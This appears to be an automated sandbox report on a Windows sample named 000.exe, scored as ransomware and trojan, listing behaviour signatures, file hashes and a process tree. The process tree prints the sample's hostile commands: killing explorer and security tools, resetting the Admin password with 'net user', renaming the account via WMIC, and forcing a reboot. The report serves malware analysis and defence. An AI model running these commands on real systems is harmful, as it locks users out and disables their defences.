Overview

overview

10

Static

static

3

000.exe

windows7-x64

000.exe

windows10-2004-x64

Analysis

  • max time kernel
    4s
  • max time network
    6s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-02-2024 20:18

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    000.exe

  • Size

    6.7MB

  • MD5

    27f84a42d581880d149185494ab621e1

  • SHA1

    2fe06b762ea303d0824b15d02aff68a321128095

  • SHA256

    5eed2b5832483191e67f2ffbdcf349a6256039a8a7f934fb6bb9188873f8a73b

  • SHA512

    9896bed08127c0d30a38b7cf0a039161b26e64bc16d33357a46c890f14c0214d6b1a78999c5da5a4b1a070edc1fb49fa3017f092b1ddd6c1e5e7920f5de305cd

  • SSDEEP

    196608:Apkr2dY/aBcjJOBHOBIQBajMtWvoJiLE1+XgRKz89G/4ZSb0Funwh6DsN2PIpCrH:Apkr2dY/aBcjJOBHOBIQBajMtWvoJiLn

Score
10/10
evasionpersistenceransomwaretrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Disables RegEdit via registry modification 1 IoCs
    evasion
  • Disables Task Manager via registry modification
    evasion
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    evasiontrojan
  • Drops desktop.ini file(s) 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 1 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 4 IoCs
    evasion
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • System policy modification 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\000.exe
    "C:\Users\Admin\AppData\Local\Temp\000.exe"
    1⤵
    • UAC bypass
    • Disables RegEdit via registry modification
    • Checks whether UAC is enabled
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Modifies WinLogon
    • Sets desktop wallpaper using registry
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3888
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4920
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im explorer.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2908
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im taskmgr.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4436
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im regedit.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2704
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im ProcessHacker.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4872
      • C:\Windows\system32\net.exe
        net user Admin URNEXT
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1056
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user Admin URNEXT
          4⤵
            PID:4604
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic useraccount where name='Admin' set FullName='UR NEXT'
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3792
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic useraccount where name='Admin' rename 'UR NEXT'
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:528
        • C:\Windows\system32\shutdown.exe
          shutdown /f /r /t 0
          3⤵
            PID:3208
      • C:\Windows\system32\LogonUI.exe
        "LogonUI.exe" /flags:0x4 /state0:0xa39a3855 /state1:0x41c64e6d
        1⤵
        • Modifies data under HKEY_USERS
        • Suspicious use of SetWindowsHookEx
        PID:4996

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
        Filesize

        640KB

        MD5

        0f3663846ad1c54966d14f4e1c07cf41

        SHA1

        feaad05a92df6656c623fe2b14497eec302c81d2

        SHA256

        01ba9ce0d83b02c3a0ef77bfcb1fb85dc2748b10599ad7013049ebe5c9a55965

        SHA512

        f695fa7caa5ce89e36b42a2074126194f9590ffa6bfd3d22d62cc71a1bc8ff68a2d0123bd44860dcea1f44a7718ef1df231a08b75033cbf7acda7d527924a4b3

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
        Filesize

        9KB

        MD5

        7050d5ae8acfbe560fa11073fef8185d

        SHA1

        5bc38e77ff06785fe0aec5a345c4ccd15752560e

        SHA256

        cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

        SHA512

        a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\one.rtf
        Filesize

        400B

        MD5

        5e163b1f0c2e5bc318b58d39fd34acce

        SHA1

        af9309ded2d9ba50e51c83c791ac6aa6ced07fc8

        SHA256

        ef2fd3a239aa65c7c9cb204e5ae003ddd6a80d439c59f813e76d4e68987a259a

        SHA512

        5da736740a1259a8e481aa4e6809f080ee18153767ccaab985017e695cc2a355c2c9e309e7d774fd3a2901d801627af1eedd6928373badc4d14ca67baea64369

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\rniw.exe
        Filesize

        76KB

        MD5

        9232120b6ff11d48a90069b25aa30abc

        SHA1

        97bb45f4076083fca037eee15d001fd284e53e47

        SHA256

        70faa0e1498461731f873d3594f20cbf2beaa6f123a06b66f9df59a9cdf862be

        SHA512

        b06688a9fc0b853d2895f11e812c48d5871f2793183fda5e9638ded22fc5dc1e813f174baedc980a1f0b6a7b0a65cd61f29bb16acc6dd45da62988eb012d6877

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\street.mp4
        Filesize

        81KB

        MD5

        d2774b188ab5dde3e2df5033a676a0b4

        SHA1

        6e8f668cba211f1c3303e4947676f2fc9e4a1bcc

        SHA256

        95374cf300097872a546d89306374e7cf2676f7a8b4c70274245d2dccfc79443

        SHA512

        3047a831ed9c8690b00763061807e98e15e9534ebc9499e3e5abb938199f9716c0e24a83a13291a8fd5b91a6598aeeef377d6793f6461fc0247ec4bbd901a131

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\windl.bat
        Filesize

        720B

        MD5

        b73032c7921e596509a179f1e0780029

        SHA1

        f155b7685b9e5b63fefab9ca0958772fa81876ce

        SHA256

        b18604254c223c6b3b56b10bcf3caf9b07ac967d6c0626a5ae8472ec44cf8bd4

        SHA512

        90ba246ef548036d6c8894891987658456e3bd85e2fe79bb2940e2d93ed74d512263670ef6af098181ee724dfda5192c659b8af4bbb4c36a27c3d135f6bfba12

        Download Submit

      • C:\Users\Admin\Desktop\UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR N1XT.txt
        Filesize

        394B

        MD5

        b35ffe3dc03de62e10b5dc3f5fa5e77c

        SHA1

        775254045145cd3a0097fbfc7b069a62beee134d

        SHA256

        f5f56b42be58680d2f666321e3c1d1d16e6b41406250e5226dfa723faef797cd

        SHA512

        79d8f79e879f8c603d88aa34844d7f857668d9da8bcf8ededba8dd4f745b2ed5bf20e9ded70ac268119a68e524e12e23023edc451a576e4f22fcfac0f1b79ef7

        Download Submit

      • memory/3888-19-0x000002CF5E860000-0x000002CF5E870000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3888-27-0x000002CF5E860000-0x000002CF5E870000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3888-0-0x000002CF43D90000-0x000002CF44440000-memory.dmp

        Filesize

        6.7MB

        Download

      • memory/3888-8-0x000002CF5EAF0000-0x000002CF5EB48000-memory.dmp

        Filesize

        352KB

        Download

      • memory/3888-2-0x000002CF5E860000-0x000002CF5E870000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3888-6-0x000002CF5E830000-0x000002CF5E844000-memory.dmp

        Filesize

        80KB

        Download

      • memory/3888-1-0x00007FFBCA4F0000-0x00007FFBCAFB1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3888-863-0x000002CF5F5C0000-0x000002CF600C4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3888-864-0x00007FFBCA4F0000-0x00007FFBCAFB1000-memory.dmp

        Filesize

        10.8MB

        Download